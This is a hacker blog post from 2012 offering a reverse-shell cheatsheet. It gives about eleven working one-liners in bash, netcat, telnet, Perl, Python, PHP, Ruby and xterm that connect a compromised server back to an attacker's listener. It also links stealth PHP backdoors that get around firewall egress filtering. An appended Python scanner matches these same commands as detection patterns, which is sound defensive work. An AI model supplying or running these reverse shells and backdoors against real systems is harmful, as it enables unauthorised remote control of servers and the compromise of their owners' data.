BLACK BURN HACKER.

Tuesday, January 31, 2012

Having trouble back-connecting? Here ya go!

Getting quite a few PMs about back-connection recently. Here's my cheatsheet for doing it manually using what the server gives you. This is more or less a backup for when a) your webshells aren't working, and b) you don't know why you can't back-connect. Hopefully you won't get stuck again.

After doing recon on your target, assess what you have access to and simply cherry-pick from below. Or just try them all, why the hell not.

1. netcat with GAPING_SECURITY_HOLE enabled:

Code:
TARGET: nc 192.168.1.133 8080 -e /bin/bash
ATTACKER: nc -n -vv -l -p 8080

2. netcat with GAPING_SECURITY_HOLE disabled:

Code:
TARGET: mknod backpipe p && nc 192.168.1.133 8080 0<backpipe | /bin/bash 1>backpipe
ATTACKER: nc -n -vv -l -p 8080

3. /dev/tcp socket hack:

Code:
TARGET: /bin/bash -i > /dev/tcp/192.168.1.133/8080 0<&1 2>&1
ATTACKER: nc -n -vv -l -p 8080

4. No nc and no /dev/tcp available?

Code:
TARGET: mknod backpipe p && telnet 192.168.1.133 8080 0<backpipe | /bin/bash 1>backpipe
ATTACKER: nc -n -vv -l -p 8080

5. Backup - no good reason to use this ahead of the others:

Code:
TARGET: telnet 127.0.0.1 8080 | /bin/bash | telnet 127.0.0.1 8888
ATTACKER: nc -n -vv -l -p 8080
ATTACKER2: nc -n -vv -l -p 8888

6. Straight bash:

Code:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

7. Inline Perl:

Code:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

8. Python:

Code:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

9. Inline PHP:

Code:
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

10. Ruby:

Code:
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

11. xterm (if available):

Code:
xterm -display 10.0.0.1:1

Tools for when a plain back-connect is filtered or you'd rather not open a socket at all:

Php-findsock-shell - designed to bypass egress filtering (fucking firewalls =]) - http://pentestmonkey.net/tools/web-shells/php-findsock-shell
Weevely - avoids bind shells/reverse shells by giving you a console over HTTP - http://www.garage4hackers.com/f11/weevely-stealth-tiny-php-backdoor-1002.html
WeBaCoo - stealth^2 - http://packetstormsecurity.org/files/108009/webacoo-0.2.zip

But what if I still can't back-connect or nothing happens? - track down the server and take a fucking sledgehammer to it -_-!
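As an added defender-side example (not code from this post), here is a small Python scanner that flags process-execution records whose command lines match the back-connect techniques listed above; the record format, indicator names and sample log lines are constructed for the example.

```python
import re

# Command-line indicators distilled from the techniques listed above.
# Constructed for this example; tune the patterns to your own environment.
INDICATORS = [
    ("bash-dev-tcp",         re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("nc-exec",              re.compile(r"\bnc\b[^|;]*\s-e\s+/bin/(?:ba)?sh")),
    ("fifo-backpipe",        re.compile(r"\bmknod\b.*\bp\b.*\|\s*/bin/(?:ba)?sh")),
    ("telnet-pipe-shell",    re.compile(r"\btelnet\b.*\|\s*/bin/(?:ba)?sh")),
    ("perl-socket-exec",     re.compile(r"\bperl\b.*\bsocket\(.*\bexec\(")),
    ("python-dup2-shell",    re.compile(r"\bpython\d?\b.*\bdup2\(.*/bin/(?:ba)?sh")),
    ("php-fsockopen-exec",   re.compile(r"\bphp\b.*\bfsockopen\(.*\bexec\(")),
    ("ruby-tcpsocket-exec",  re.compile(r"\bruby\b.*\bTCPSocket\b.*\bexec\b")),
    ("xterm-remote-display", re.compile(r"\bxterm\b.*-display\s+\S+:\d")),
]

# Constructed record format: "<timestamp> uid=<uid> cmd=<full command line>"
LOG_LINE = re.compile(r"(\S+) uid=(\d+) cmd=(.*)")

def classify(cmdline):
    """Return the names of every indicator that matches one command line."""
    return [name for name, rx in INDICATORS if rx.search(cmdline)]

def scan_log(lines):
    """Parse process-execution records and return only the suspicious ones."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip malformed records rather than abort the scan
        ts, uid, cmd = m.groups()
        names = classify(cmd)
        if names:
            hits.append({"ts": ts, "uid": int(uid), "indicators": names, "cmd": cmd})
    return hits

# Constructed sample records: benign admin activity mixed with techniques from the list.
SAMPLE_LOG = [
    "2012-01-31T10:00:01Z uid=33 cmd=ls -la /var/www",
    "2012-01-31T10:00:05Z uid=33 cmd=bash -i >& /dev/tcp/10.0.0.1/8080 0>&1",
    "2012-01-31T10:00:09Z uid=33 cmd=nc -zv 10.0.0.5 443",
    "2012-01-31T10:00:12Z uid=33 cmd=mknod backpipe p && nc 192.168.1.133 8080 0<backpipe | /bin/bash 1>backpipe",
    "2012-01-31T10:00:20Z uid=1000 cmd=python3 -m http.server 8000",
    "2012-01-31T10:00:31Z uid=33 cmd=php -r '$sock=fsockopen(\"10.0.0.1\",1234);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} uid={hit['uid']} {','.join(hit['indicators'])}: {hit['cmd']}")
```

Feed it the command lines from auditd execve records or your EDR's process telemetry; a hit from the web server's uid (33 here) is the case worth paging on.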
©2011, copyright BLACK BURN
